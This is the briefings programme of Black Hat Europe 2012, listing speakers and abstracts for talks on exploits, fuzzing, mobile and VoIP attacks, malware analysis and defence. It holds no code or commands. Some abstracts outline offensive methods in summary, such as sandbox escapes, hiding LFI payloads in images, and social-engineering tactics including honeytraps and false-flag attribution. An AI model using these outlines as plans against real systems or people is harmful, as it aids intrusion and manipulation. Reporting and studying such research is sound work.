Black Hat Europe 2012

Black Hat Europe 2012 // Briefings

Grand Krasnapolsky Hotel
mar 14 - 16


Whitfield Diffie
Yet Another Look at the State of Security

Every day brings another sobering manifestation of cyber-insecurity and another prediction of doom from the invited speakers at our seminars, yet the internet juggernaut keeps juggernauting along. We will take an historical and critical look at the current state of affairs that leaves in its wake a fatalistic optimism.


Axelle Apvrille - Guillaume Lovet
An Attacker's Day into Virology: Human vs Computer

Computer virology bares such a strong resemblance with Human virology that both worlds have often been compared humorously. In this presentation, we wish to push the comparison further down into the details of implementation and attack strategies. Have you ever wondered how much those nasty biological viruses actually invented before Black Hats did? They surely invented brute-force attacks, polymorphism and time bombs, and yet, they never presented at BlackHat for this!

We intend to give them credit for some of their best attack scenarios. For instance, Influenza, who intentionally omits a replication error checking protein to have copies randomly mutate, is a potential nominee.

On the other hand, there are few techniques we can only be grateful biology has not picked up yet, and dearly hope viruses won't ever evolve from BlackHat attendees genomes. Indeed, what would happen to us if chicken pox, measles, or rotavirus played cat and mice with medical doctors and continuously learned to detect test tubes (virtual machines) and microscopes (reverse engineering tools)?

Finally, considering the advances of cybernetics, we contemplate the possibilities of actually witnessing a convergence between human and computer viruses in a more or less distant future.

Jerome Athias
Opcodes Database Revival (or Why I Prefer to Collect jmp ESP Than Pokemons)

"The Opcode Database is an important resource for writers of new exploits. Buffer overflow exploits on Windows often require precise knowledge of the position of certain machine language opcodes in the attacked program or included DLLs. These positions differ in the various versions and patch-levels of a given operating system, and they are all documented and conveniently searchable in the Opcode Database. This allows one to write buffer overflow exploits which work across different versions of the target operating system." Some tips and tools to build your own opcodes database or leech mine while drinking a beer.

Antonios Atlasis
Attacking IPv6 Implementation Using Fragmentation

IP fragmentation attacks is not a new issue. There are many publications regarding their exploitation for various purposes, including, but not limited to, OS fingerprinting, IDS/IPS insertion/evasion, firewall evasion and even remote code execution. The adoption of the new IP version, IPv6, has opened new potential exploitation fields to the attackers and pen testers. In this paper, it will be examined whether fragmentation issues still remain in IPv6 implementation of some of the most popular Operating Systems and whether they can also be used for the aforementioned purposes. To this end, several fragmentation attacks will be presented and their impact will be examined. As it will be shown, most of the popular OS, such as Windows, Linux and OpenBSD are susceptible to such attacks. In each case, the corresponding proof of concept code is provided. As it will be explained, such attacks, under specific circumstances can lead to OS fingerprinting, IDS insertion/evasion and firewalls evasions. Finally, these tests will also show which OS appears to be the most immune to IPv6 fragmentation attacks.

Don A. Bailey
War Texting: Weaponizing Machine to Machine Systems

Devices have been attached to the telephone network for years. Typically, we think of these devices in terms of modems, faxes, or TTY systems. Now, there is a growing shift in the nature of the devices that are accessible over the telephone network. Today, A-GPS tracking devices, 3G Security Cameras, Urban Traffic Control systems, SCADA sensors, Home Control and Automation systems, and even vehicles are now telephony enabled. These systems often receive control messages over the telephone network in the form of text messages (SMS) or GPRS data. These messages can trigger actions such as firmware updates, Are You There requests, or even solicitations for data. As a result, it is imperative for mobile researchers to understand how these systems can be detected by attackers on the global telephone network, then potentially abused.

These systems are increasingly capable of affecting the physical world around us. Additionally, devices attached to the phone network cannot be easily compartmentalized or firewalled from potential abusers the same way that IP enabled systems can. Therefore, understanding the threat models associated with these devices and the telephone network will allow mobile researchers and embedded engineers to correctly implement security solutions that minimize a device's exposure to threat actors.

Empirical evidence will be presented that demonstrates creative and successful ways to classify potential devices amongst millions of phone numbers world wide. Once properly classified, devices can be interacted with in simple and efficient ways that will be revealed by the speaker.

Michael Baker
Finding Needles in Haystacks (The Size of Countries)

The lament of security analysts is often a limitation in the amount of data they can process, and the ensuing loss of data fidelity as size increases. As data sets grow they become unwieldy, making it difficult to add context through correlating security event data with other relevant data sets.

Full packet capture provides a method for maintaining a forensic copy of all network conversations. However the reality up until now is that full packet capture and analysis has been bounded by the size of the data, the time to process it and the ability of applications and tools to encode key attack, deviations, mis-use and anomaly data into visualizations.

When you can store all of your network data the issue then becomes how do you analyze it. How do you find the single conversation you are looking for in trillions of conversations?

Big Data has supplied both a method for parallel computation and at the same time the cost of storing all network data (full packet capture) is within reach of all organizations. At the same time threats are becoming more blended, complex and difficult to find. Big Data tools such as Apache Hadoop, PIG and NoSQL databases provide the ability to perform complex network traffic analysis at petabyte scale. These tools can be leveraged using the Amazon Cloud (Elastic Map Reduce) to process, query and persist packet capture data.

With these tools there is no time-cost trade off to analyzing every single conversation on a network, enriching the data, intersecting data sets and sharing anonymised data sets.

Allowing you to answer questions that not many tools can:

  • How can I find Zero Day attacks in past traffic?
  • How can I better detect attacks at greater confidence?
  • What is normal?
  • What is new (never seen before)?
  • What attackers are similar to other attacks?
  • What is the operating system and patch level of my attackers?
  • What protocols are strongly correlated in relation to sessions, bandwidth and payloads?
  • What sessions are tunnels?
  • After each attack how did the victim's sessions and protocols change?
  • What is a normal HTTP payload for each of my web servers? - - How does an attack differ?
  • What are attackers doing within HTTPS sessions to my websites.
  • How can I intersect white and blacklists with my network packet captures?

Tal Be'ery
FYI: You've Got LFI

RFI/ LFI attacks are a favorite choice for hackers. Why? A successful attack allows the execution of arbitrary code on the attacked platform in the context of the web application. With the same level of authorization – it can practically take over the server.

Surprisingly, however, RFI/ LFI are still considered the underdogs of vulnerabilities. Attractive RFI/ LFI attack targets are commonly PHP applications With more than 77% of today's websites running PHP, RFI should be on every security practitioner's radar—but isn't. Some notorious RFI/ LFI examples include: Anonymous using RFI bots to attack their targets and Timthumb- a WordPress add-on vulnerable to LFI which paved the way to 1.2 million infected websites.

It's time to seriously examine RFI/ LFI attacks. In this talk we quantify the prevalence of this attack based on our findings of this attack in the wild. We present proof of concepts which demonstrate how these attacks evade detection. We will also present new approaches in defeating this type of attack. In particular, we:

  • Introduce the RFI\LFI concepts and evaluate its potential effectiveness in the wild
  • Demonstrate RFI attacks – starting with the basics and moving to recently witnessed advanced schemes which exploit PHP streams.
  • Present a proof of concept of how to hide an LFI attack within benign-looking documents such as pictures and pdf documents
  • Reveal a new RFI/LFI attack vector which evades anti-malware by splitting the attack vector across different picture textual fields.
  • Provide mitigation steps to defeat against RFI/ LFI attacks, including a novel approach which uses shell hosting feed.

Andrey Belenko - Dmitry Sklyarov
"Secure Password Managers" and "Military-Grade Encryption" on Smartphones: Oh Really?

The task of providing privacy and data confidentiality with mobile applications becomes more and more important as the adoption of smartphones and tablets grows. As a result, there are number of vendors and applications providing solutions to address those needs, such as password managers and file encryption utilities for mobile devices.

In this talk we will analyze several password managers and file encryption applications for Apple iOS platform and demonstrate that they often do not provide any reasonable level of security and that syncing data between desktop and mobile versions of the applications increases the risk of compromise. We will also show that the best way to provide privacy and confidentiality on Apple iOS platform is by adhering to Apple Developer Guidelines and not by reinventing the wheel.

Andy Davis
HDMI - Hacking Displays Made Interesting

Picture this scene, which happens thousands of times every day all around the world: Someone walks into a meeting room, sees a video cable and plugs it into their laptop. The other end of the cable is out of sight – it just disappears through a hole in the table. What is it connected to? Presumably the video projector bolted to the ceiling, but can it be trusted to just display their PowerPoint presentation?...

This presentation discusses the security of video drivers which interpret and process data supplied to them by external displays, projectors and KVM switches. It covers all the main video standards, including VGA, DVI, HDMI and DisplayPort. It also details the construction of a hardware-based EDID fuzzer using an Arduino Microcontroller and a discussion of some of its findings.

Stephen de Vries
Beyond Scanning: Automating Web Application Security Tests

Two new trends in web integration testing provide fresh tools to automate business logic and access control tests for web applications. These have traditionally been weak areas for web security scanning tools.

Security testing is often disconnected from the rest of the software development and testing phases. This talk will introduce the attendees to 3 key concepts that will allow security testing to be easily integrated into the development cycle.

  1. Behavioural Driven Design (BDD) and the easyb tool, provide a simple solution to defining security requirements upfront and then testing those requirements throughout the development cycle, e.g. by integrating into a continuous build environment.
  2. Page Objects, allow security tests to be separated from the web application. Traditional Selenium tests suffer from being brittle and difficult to maintain. Page Objects helps solve that problem and allow the same set of security tests to be run unmodified on almost any web application. A suite of easyb security tests will be released that can be configured and executed on most web applications.
  3. Burp Intruder is a popular web app testing tool but is mostly used during manual testing. A new plugin will be released that exposes the Burp API over HTTP/JSON which can then be used in automated test scripts.

Live code demonstrations will be used throughout to illustrate the concepts and introduce the tools.
Two new tools will be released:

  • EasybSecurity, a set of easyb specification and testing scripts that perform security testing on web applications.
  • RestyBurp, a RESTful interface over HTTP/JSON to the Burp testing tool to allow other application to easily drive and communicate with Burp.

Tyrone Erasmus
The Heavy Metal That Poisoned the Droid

The widely publicised malware on the Android Marketplace relies on the fact that users do not review permissions when installing applications. A lesser known fact is that an installed application with no special permissions will often be able to access a user's most sensitive data regardless. Upon reviewing multiple Android handsets and applications, the sheer number of information disclosure vulnerabilities found was alarming.

A live demonstration will be conducted on well-known Android phones, showing how a person's most sensitive data can be compromised by an attacker. After discovering many vulnerabilities in Android applications that allows information to be leaked and privileges to be escalated, it was clear that there was a need for a tool that allows security specialists to view the attack surface of applications from an unprivileged context and interact with them in an intuitive manner.

Mercury is a tool that allows its user to dynamically examine the attack surface of applications that reside on a device and exploit them. It is split into two parts, using a client/server model in order to meet its goals.

The design of the system works by placing a low-privileged server application that is deployed on the Android device which interacts with a command-line interface on the user's computer. This model provides users with a rich experience that will not disappoint. This class of tool is very different from source code analysis is as it is aimed to be a practical interactive platform for Android bug hunters.

The main objective of Mercury is to be an auditing tool that can be used for many purposes. Some features which make this possible are the following:

  • The ease with which a user can find relevant information about exposed application attack vectors
  • Command-line interaction with applications on the device in order to find vulnerabilities
  • The ability to write proof-of-concept exploits for vulnerabilities using a range of pre-defined commands. This effectively removes the need for custom application writing in order to perform tests against the target vulnerability.
  • MWR Labs research that allows the exploitation of debuggable applications, SQL injection on content providers and various other privilege escalation techniques

The exploitation wing of Mercury is currently under heavy development, finding innovative ways of escalating privileges from an unprivileged context. It is the hope that this tool will be released to the public as part of Tyrone's talk at BlackHat EU 2012. This talk would present multiple vulnerabilities found in Android handsets and techniques for exploiting different applications using Mercury.

Dan Guido - Mike Arpaia
The Mobile Exploit Intelligence Project

As organizations look to deploy larger numbers of mobile devices over this year, there is widespread disagreement in the security industry over which platforms are more secure, what mobile security measures are effective, and what the greatest risks of these platforms are. At the same time, the mobile malware community, while still in its infancy, is developing rapidly and several successful attacks have been executed against iOS and Android in the last year.

In this talk, we demonstrate an intelligence-driven approach to mobile defense, focused on attacker capabilities and methods, with data collected from past remote attacks and jailbreaks against Android and iOS. This analysis identifies the means by which exploits are developed and distributed in attacks, separates defenses that work from defenses that don't, and provides analytical tools that attendees can use to objectively evaluate the exploitability of mobile operating systems. Finally, we use this empirical data on attacker capabilities to make projections on where mobile malware is headed in the near to long term.

Takahiro Haruyama - Hiroshi Suzuki
One-byte Modification for Breaking Memory Forensic Analysis

Memory forensics is an effective technique to detect malwares quickly or extract sensitive user data from RAM. Memory forensics is separated into two parts: memory acquisition and analysis. So far, some anti-acquisition methods were proposed and demonstrated, but there was no sufficient discussion about anti-analysis ones.

This presentation introduces anti-analysis methods based on unconsidered assumptions of the existing analysis tools. By using the methods, attackers can abort memory analysis and make the result empty. Since it's difficult for forensic analysts to figure out the cause from error messages, they must think acquired memory images are simply corrupted. Specifically, anti-analysis methods focus attention on three operations performed in memory analysis. All major analysis tools take several rapid approaches in these operations. If attackers want to make the analysis tools fail with the smallest modification, all they have to do is to modify only one byte of the data structure related to one approach. Of course, the modification has no impact on the running system.

The presentation is made up as follows. First, I show an overview about memory acquisition and analysis such as memory image formats, evaluation of acquisition tools, memory analyzing methods, comparison of analysis tools, and so on. Next, I point out issues of each analysis tool and key structures referred to by it, then I demonstrate all analysis tools fail by modifying data in the structures. Finally, I suggest desired usages for forensic analysts and improvement plans for developers to decrease the risk of anti-analysis methods.

Marcia Hofmann - Seth Schoen
Defending Privacy at the U.S. Border: A Guide for Travelers Carrying Digital Devices

A series of unfortunate court decisions allows border agents to search travelers' laptops, mobile phones, and other digital devices without limitation at the United States border. These searches are relatively rare, but they continue to occur and could become more routine as computer forensics gets cheaper and agents develop new ways of targeting particular travelers. How can international travelers protect themselves when they cross the United States border?

Marcia Hofmann and Seth Schoen of the Electronic Frontier Foundation will provide a clear, up-to-date, and thorough overview of this issue for all travelers to the U.S. based on their recently published white paper "Defending Privacy at the U.S. Border: A Guide for Travelers Carrying Digital Devices." This presentation combines legal and technical perspectives, discussing the law and policies that apply when international travelers enter or leave the United States, as well as various ways that travelers can safeguard electronic devices and digital information at the border.

Vincenzo Iozzo
A Sandbox Odyssey

In this talk the App Sandboxing technology will be dissected to understand what are the strength of this technology and its shortcomings. Specifically what are the actions that a sandbox app is allowed to perform and how those actions can harm an user. Moreover the "logical" flaws of this security countermeasure will be analyzed to verify how effective and feasible is to apply a coherent and bulletproof isolation of the application from the surrounding system.

Jeff Jarmoc
SSL/TLS Interception Proxies and Transitive Trust

SSL/TLS is entrusted with securing many of the communications services we take for granted in our connected world. Threat actors are also aware of the advantages offered by encrypted communication channels, and increasingly utilize encryption for exploit delivery, malware command-and-control and data exfiltration.

To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end SSL/TLS channels. Web proxies, DLP systems, specialized threat detection solutions, and network IPSs now offer functionality to intercept, inspect and filter encrypted traffic. Similar functionality is also present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as "SSL/TLS Interception Proxies," these solutions act as man-in-the-middle, violating the end-to-end security guarantees promised by SSL/TLS.

In this presentation we'll explore a phenomenon known as "transitive trust," and explain how deployment of SSL/TLS interception solutions can introduce new vulnerabilities. We detail a collection of new vulnerabilities in widely used interception proxies first discovered by the Dell SecureWorks CTU and responsibly disclosed to the impacted vendors. These vulnerabilities enable attackers to more easily intercept and modify secure communications. In addition, we will introduce a public web site that organizations can use to quickly and easily test for these flaws.

Michael Jordon - James Forshaw
CANAPE: Bytes Your Bits

Testing and exploiting binary network protocols can be both complex and time consuming. More often than not, custom software needs to be developed to proxy, parse and manipulate the traffic. CANAPE is a new Windows tool we are releasing at Blackhat which takes the existing paradigm of Web Application testing tools (such as CAT, Burp or Fiddler) and applies that to any network protocol. CANAPE provides a user interface that facilitates the capture and replaying of binary network traffic, whilst providing a framework to develop parsers and fuzzers.

This presentation will follow a worked example of using CANAPE to analyse the Citrix ICA binary protocol, allowing the discovery of a heap corruption bug that can be used to gain remote code execution on Citrix clients.

Ling Chuan Lee - Chan Lee Yee
GDI Font Fuzzing in Windows Kernel For Fun

There are different types of font available within Windows and two groups of categories exist: GDI fonts and Device fonts. This talk will cover the GDI TrueType & GDI Bitmap fonts only on Windows platform.

In GDI, one typically to create font is filling in a LOGFONT Structure and then calling CreateFontIndirect which returns a font handle. As expect from the name, a LOGFONT structure is a logical font, if the user draw some text using that font handle, GDI will look for a matching physical font to draw the text. If it doesn't find any match font name, it will use some other font.

The resulting outcome is that the font fuzzer is working at the lower level through physical font API's provided by the GDI itself. For instance, API functions GetFontData, GetGlyphIndices and even ExtTextOut when used with the ETO_GLYPH_INDEX flag. Font fuzzer in this talk is aim to trigger the font vulnerabilities published in internet, two vulnerability in Windows Kernel MS11-077 and MS11-087 in handling crafted font will be discussed in this talk.

Felix 'FX' Lindner
Apple vs. Google Client Platforms

We will discuss the two different approaches Apple and Google take for the client platforms iPad and Chromebook, how they are similar and how they are not.

From the security architecture and integrity protection details to your account and identity that links you firmly back to the respective vendor, we will provide the big picture with occasional close-up shots. Here is what powers the vendor has over you, or what powers he gives to arbitrary attackers at expensive coffee shops with free WiFi through fails in logic, binary or HTML.

David Litchfield
An Assortment of Database Goodies

This talk will look at a mixed bag of security weaknesses in the Oracle database server with demonstrations on exploiting them to gain DBA privileges.

Steve Lord
Drop It Like It's Hotspot: Hacking Mifi Routers For Nefarious Purposes

Many people (Steve included until recently) hold the opinion that the little black boxes you use to connect to the Internet are mostly little black boxes that do little else. When he bought a portable Mifi hotspot, little did he know that after peeling back the covers that he held in his hands one of the most easily re-purposed malicious toolkits. In this talk, Steve will walk delegates through firmware analysis, router hacking techniques and final through modification in order to re-use them for nefarious purposes. There may (or may not) be demos if there's time. Just make sure that the wifi network you're connecting to is the one you think it is and not Steve's.

Rafal Los - Shane MacDougall
Offensive Threat Modeling for Attackers: Turning Threat Modeling on its Head

Modern threat modeling is a defensive response to understanding a threat so as to prepare yourself, your network, and your assets. This talk shows how threat modeling can be used as an offensive weapon. While traditional threat modeling looks at the attacker, the asset and the system – offensive threat modeling looks back at the defender to understand his tactics and expose weaknesses.

This talk focuses heavily (but not exclusively) on the human side of the defensive equation to get inside the mind of the defender. Combining expertise in intelligence gathering through social reconnaissance and various other methods of social engineering with expertise in traditional threat modeling and penetration testing – this talk yields a powerful new weapon in the attacker's toolbox.

The speakers will highlight the attack vectors used by nation states and organized groups in "APT" attacks, which encompass a holistic approach to fingerprinting and profiling targets (Posture and Position) to yield devastating results. In many cases, data culled from social media, supply chain, satellite imagery, property management, conference attendance, personal browsing predispositions, sales literature, even political campaign donations can be aggregated and prioritized to increase the likelihood of success. In one example, we show how "grey area" websites that allow users to sign up as "providers", once past their trivial validation, can obtain useful information about potential clients registered with the website. Information gleaned over many of these sites in cities where a target has a presence can be used to identify persons or organizations at risk of attack/blackmail.

Tactics taught will include social media monitoring of employee actions and locations (Position and Predisposition) to create near real-time actionable pretexting for social engineering attacks. Additional back channel attacks focus on employee home networks, allowing for successful network penetration of a company while never targeting the company directly (Predisposition, Posture, and Position). This is accomplished via psychological profiling and sentiment analysis of users, to deploy specific honeytraps for employees and their families (Predisposition) and reverse honeypots for target company InfoSec groups (Position) as adjunct attack vectors. Counterintelligence, misdirection, weaknesses of other attackers (if they exist and can be identified/created), and false flag attribution are utilized to increase effectiveness of the attack, tie up defenders, and minimize detection (Posture and Position). We will also show how to utilize social media poisoning, where we attempt to change both public and employee perception of the target, incentivizing attacks both externally and from within (Predisposition).

Much like a spy movie plot, this talk will provide the attacker with the necessary tools to know their target, control the situation more effectively, and have a greater chance at successfully reaching their goal. This talk is meant to be used to understand how the other side (the attackers) sees you (the defenders) in any scenario and what the defenders should expect … to formulate a solid defensive posture.

Guillaume Lovet - Zhenhua Liu
Breeding Sandworms: How To Fuzz Your Way Out of Adobe Reader's Sandbox

Adobe's interpretation of sandboxing is called Adobe Reader X Protected Mode. Inspired by Microsoft's Practical Windows Sandboxing techniques, it was introduced in July 2010. So far, it had been doing a good job at limiting the impact of exploitable bugs in Adobe Reader X, as escaping the sandbox after successful exploitation turned to be particularly challenging, and hasn't been witnessed in the wild, yet.

This paper exposes how we did just this: By leveraging some broker APIs, a policy flaw, and a little more, we were able to break free from Adobe's sandbox.

The particular vulnerability we used was patched by Adobe in September 2011 (CVE-2011-1353), as a result of our responsible disclosure action; yet, this demonstrates that Adobe's sandbox cannot be considered a panacea against security flaws exploitation in Adobe Reader X, and paves the way toward further interesting discoveries for security researchers.

Indeed, beyond this particular vulnerability, this paper dives deep into the sandbox implementation of Adobe Reader X, and debates ways to audit its broker APIs, which, to our minds, offer a major attack surface. In particular, the paper details how we configured an open-source fuzzing tool to audit them through the IPC Framework.

Matias Madou
Secure in 2010? Broken in 2011!

In 2010, a security research firm stumbled on a couple of vulnerabilities in Apache OFBiz, a widely used open source enterprise automation software project. As a proof of concept, it posted a video showing how easy it was to become an administrator exploiting one of the XSS issues in the application. To remain credible, the OFBiz team was forced to invest in security. In fact, as a result of digging into its bug database, the OFBiz team gathered security knowledge from different sources to make its product better, and made a big push to resolve the known issues in early 2010. Barely a year later, the exact same code base thought to be secure is again seriously broken. This scenario actually occurs quite frequently for several reasons.

We begin this presentation by examining the new security enhancements that had been put in place by OFBiz. We will use new critical OFBiz vulnerabilities throughout the presentation to demonstrate how applications can be severely broken shortly after that they were thought to be secure. We demonstrate how new categories of vulnerabilities discovered in 2011 and new detection capabilities are discovering previously unfound weaknesses in applications. Continued testing with tools that incorporate the latest security knowledge is highly recommended for every corporation.

Nikhil Mittal
The Pwnage Saga Continues

When Kautilya was being written, only one thing was thought of: utter pwnage. Operating Systems continue to trust Human Interface Devices. If you are a HID it means no X-Ray, no pat down and no random security check either ;)You are not supposed to be a threat by any countermeasure or security mechanism.

Many of us, for our Penetration Tests have been using Teensy. A programmable USB Micro-controller which can be used as a 'keyboard' and could be programmed to type as per our wish. Kautilya is the toolkit for easing the use of Teensy in Penetration Tests. Some new and shiny attack methods have been implemented into it. This talk will focus on these new methods to get into modern Operating Systems. The talk will be full of live demonstrations.

Mariano Nunez Di Croce
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?

Global Fortune 1000 companies, large governmental organizations and defense entities have something in common: they rely on SAP platforms to run their business-critical processes and information. In this scenario, cyber-criminals looking to perform espionage, sabotage or financial fraud attacks know that these systems are keeping the business crown jewels.

But, how difficult is for them to break into an SAP system today? Are we properly protecting the business information or are we exposed?

Five years ago, we were invited to hold the first public presentation on real-world cyber-threats to SAP systems at BlackHat Europe 2007. Since then, we have performed specialized Penetration Tests against the SAP platforms of several of the largest organizations of the world, enabling us to get an educated answer to those questions.

Join us in this new presentation to learn:

  • How a cyber-attacker may break into an SAP system, completely anonymously.
  • Which are the Top-10 technical vulnerabilities found in real-world SAP implementations.
  • How protected are SAP systems from attacks over the Internet and internal networks.
  • How feasible it is to detect attacks in real-time and/or forensic investigations.
  • Which are the most effective measures to secure this business-critical platform.

This presentation will feature live demonstrations of attacks, war stories and statistics from real-world assessments.

Phil Polstra
Preventing "Oh Shit!" Moments for 20 Euros or Less

This presentation will discuss the use of microcontrollers in computer security and forensics. In particular, several small USB flash drive forensic devices will be demonstrated, including forensic duplicators and an inexpensive write blocker. All devices to be shown can be built for under US$30.

A USB write blocker can prevent "Oh shit!" moment when you plug your flash drive full of your favorite security tools into a machine and watch as the machine's antivirus starts deleting your stuff. The write blocker is also useful for ensuring that a subject drive is not altered while evaluating whether or not there is anything interesting enough to create a forensic image.

The smallest USB duplicator fits inside an Altoids gum tin. It is portable enough to always have with you. A PC is not required to make forensic copies with this device.

Jerome Radcliffe
Issues with Embedded Device Disclosures: Helping the Vendors and Recognizing the End-Users

Computer security research often focuses on the disclosure of vulnerabilities in traditional computing devices, such as DNS or Mail Systems. Recently, however, there has been a growth of vulnerabilities being discovered in embedded devices such as automobiles, SCADA hardware, and medical devices. These non-traditional computer devices have additional complexities and impacts that are, as of yet, unexamined.

First, although much is made of the process of disclosure of the vulnerability itself, the response by the market place and manufacture are rarely discussed. Companies that produce many of these devices are generally under prepared to handle new found vulnerabilities.

Second, many of the disclosures with these non-traditional devices impact more than just a vendor, a computer administrator, or a company. The end user, the individual with the most at risk from some vulnerabilities, are often unaware of a vulnerability unless the mainstream media finds an interest in the story.

At Black Hat 2011, for example, there was a presentation about vulnerabilities in insulin pumps, which struck a chord with the media and resulted in the diabetic community, eventually prompting quite a few diabetics to voice their opinions through blog posts and tweets.

A prominent diabetic blogger, Kerri Sparling from SixUntilMe, will talk about how a vulnerability disclosure can impact end users in ways that researchers usually are not aware of.

Damir Rajnovic
36 Views of Cyberspace

The word "cyberspace" is today used in many contexts but it is not always clear what exactly that term describes and what it means. In this paper we will compare definitions of cyberspace from several sources. Sources are relevant entities like national or regional government, standardization bodies and a dictionary. The purpose of this comparison is to establish the range of notions what the cyberspace is and to derive an ontology of cyberspace.

We will analyse which categories (identified from the existing definitions of cyberspace) are required for the cyberspace to exist. Finally, we will offer suggestions what elements a definition of cyberspace should have.

Enno Rey - Daniel Mende
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Crypto Ecosystem

Modern "Enterprise" VoIP solutions are complex beasts. They usually encompass application servers (e.g. for mailboxes and to provide CTI functions), "infrastructure systems" for authentication or crypto stuff and "intelligent" phones.

In the end of the days the inherent complexity means that - while "traditional" VoIP attacks (like re-directing, sniffing and reconstructing calls) might no longer work - we've been able to severely compromise any enterprise VoIP environment we've pentested in the last twelve months. Based on a number of warstories, in this talk we'll first lay out the relevant attack vectors and the protocol or device level vulnerabilities enabling those.

We will then focus on Cisco's Unified Communications solution that seemingly disposes of a mature, certificate based crypto framework protecting both the signaling and the media transport. Well, seemingly. When closely inspecting the relevant parts and messages, it turns out that at some point all the key material can be replaced by attacker chosen keys. Which effectively means that we're down to cleartext-like attacks again...

For the first time we'll publicly provide a detailed technical explanation of the underlying vulnerabilities, show a live demo sniffing calls in a presumably fully encrypted environment and - of course ;-) - release a tool automating a number of steps of the complex overall attack. A discussion of potential mitigating controls, both on a technical and on the provisioning process level, completes the talk.

Tom Ritter
The IETF & The Future of Security Protocols: All The Signal, None of the Noise

The IETF meets in person three times a year and publishes dozens of standards - most of which take years to be implemented if they ever are. The drafts are rarely talked about at conferences, on twitter, or heard about in the development or security industry until long after they're finalized. But the Working Groups are surprisingly accessible and the things being discussed now will provide long-term fixes for the attacks we've been hacking around today.

We'll talk about the things going on in the Web Security, Public Key Infrastructure, TLS, and DNS Working Groups and improvements being made to Browsers, HTTP, and Javascript - and draw conclusions about what will and won't work. Early successes include the experimental technology that first detected the Diginotar Certificate Authority breach and TLS improvements that provide replacements for the parts that make cryptographers uneasy. And we'll talk about the things we're not as optimistic about; like Content Security Policy and why it hopes to end Cross Site Scripting but won't. We'll also do a short survey of the superficial and radical proposals to augment, replace, or bypass the Certificate Authority system.

Simon Roses Femerling
Smartphone's Apps Are Not That Smart: Insecure Development Practices

Mobile Apps is a growing business with thousands of applications to choose from across the dominants mobile platforms and new Apps released every week. Users install in their smartphones all kind of free Apps and many users are willing to pay for commercial ones usually due to low prices. Apps have become the new Web.

The Apps fever has provoked that thousands of developers, experienced and inexperienced, worldwide constantly release new and updated Apps to attract users so they become popular and in most cases make a profit. Unfortunately this development madness tends to sacrifice security and privacy.

This presentation unveils the ugly truth that too many Apps are highly insecure. The results are based on the security analysis performed on dozens of Apps on different smartphones by identifying flaws that can be avoided with safe development practices.

Paul Royal
Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis

The detection of malware analysis environments has become popular and commoditized. Detection techniques previously reserved for more sophisticated forms of malware are now available to any novice cyber criminal. The use of next-generation virtualization-based malware analysis technologies considerably reduces the number of possible transparency shortcomings, but still fails to handle pathologically resistant malware instances that will only run on physical hardware.

Thus far, the execution of malware on physical (or baremetal) hardware has been useful for one or a handful of malware samples of interest. However, this activity was manually driven and time intensive (e.g., infect, study, format, reinstall). This presentation will resolve these long-outstanding shortcomings by describing the design and implementation of a scalable, automated baremetal malware analysis system, which can be constructed using inexpensive commodity hardware and freely available technologies. To motivate the approach's need, previously unpublished detection attacks for popular environments used to automate malware analysis (i.e., VMWare, QEMU) will be shown.

Rahul Sasi
IVR Security- Internal Network Attack via Phone Lines

The following research is on IVR (Interactive Voice Response) systems which are currently used in Phone Banking, Call centers, Hospitals and corporate mainly for information retrieval and Remote Management via Telephone lines. The paper explains a serious of security issues concerning these systems (IVR) and exploitation techniques and ways of carrying out attacks on internal network via Telephone lines. A demonstration of few exploits on IVR systems and a real incident about a critical responsibly disclosed banking flow in its Phone Banking System would be done.

Justin Searle
Dissecting Smart Meters

The Smart Grid brings greater benefits for electric utilities and customer alike, however these benefits come at a cost from a security perspective. This presentation will explore the architecture of most Smart Meters, the protocols they use, a breakdown of their embedded components, and the functionality their headend servers contain. We'll explain the methodologies we've developed to perform penetration testing these AMI systems, enumerate the types of vulnerabilities we commonly find, and discuss the solutions we recommend to Smart Meter vendors. We will even demonstrate at least one of the attacks we commonly perform in our penetration tests. This will be done without the FUD and over-hyped framing that we usually find in the media and other Smart Grid presentations.

Shreeraj Shah
HTML5 Top 10 Threats: Stealth Attacks and Silent Exploits

HTML5 is an emerging stack for next generation applications. HTML5 is enhancing browser capabilities and able to execute Rich Internet Applications in the context of modern browser architecture. Interestingly HTML5 can run on mobile devices as well and it makes even more complicated. HTML5 is not a single technology stack but combination of various components like XMLHttpRequest (XHR), Document Object model (DOM), Cross Origin Resource Sharing (CORS) and enhanced HTML/Browser rendering. It brings several new technologies to the browser which were not seen before like localstorage, webSQL, websocket, webworkers, enhanced XHR, DOM based XPATH to name a few. It has enhanced attack surface and point of exploitations for attacker and malicious agents. By leveraging these vectors one can craft stealth attacks and silent exploits, it is hard to detect and easy to compromise.

In this paper and talk we are going to walk through these new architectures, attack surface and possible threats. Here are the top 10 threats which we are going to cover in detail with real life examples and demos.

  • ClickJacking & Phishing by mixing layers and iframe
  • CSRF and leveraging CORS to bypass SOP
  • Attacking WebSQL and client side SQL injection
  • Stealing information from Storage and Global variables
  • HTML 5 tag abuse and XSS
  • HTML 5/DOM based XSS and redirects
  • DOM injections and Hijacking with HTML 5
  • Abusing thick client features
  • Using WebSockets for stealth attacks
  • Abusing WebWorker functionality

Above attack vectors and understanding will give more idea about HTML5 security concerns and required defense. It is imperative to focus on these new attack vectors and start addressing in today's environment before attackers start leveraging these features to their advantage. We are going to see new tricks for HTML5 vulnerabilities scanning and tools.

Sumit Siddharth - Tom Forbes
Hacking XPATH 2.0

The presentation will discuss the vulnerability XPATH Injection in depth and we will cover advanced exploitation techniques. We will talk about xpath 2.0 and how an attacker can not just obtain the XML document but also obtain files outside the current document. We will discuss how to exploit vulnerabilities blindly and the case when the application does not reveal anything (ie. compare this to a time based sql injection). Exfiltrating data over out of bound channel such as HTTP, DNS will also be discussed followed by some real life examples of the vulnerability found in the wild. Finally we will release an open-source tool to automate exploiting this vulnerability with all advanced exploitation features built in.

Alexey Sintsov
Lotus Domino: Penetration Through the Controller

In the talk an overview of some ways to break Lotus through the Domino Controller (includes 0day bug) will be presented.

Didier Stevens
Malicious PDF Analysis

This workshop will teach you the fundamentals you need to know to analyze (malicious) PDF documents. Didier Stevens will familiarize you with PDFiD and pdf-parser, two essential tools for PDF analysis he authored.

Each attendee will receive a copy of a 20+ page PDF analysis document Didier Stevens authored. And yes, this document will be provided in the Portable Document Format, but hey, when you successfully complete this workshop, you will know how to identify malicious PDF files

Ben Williams
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

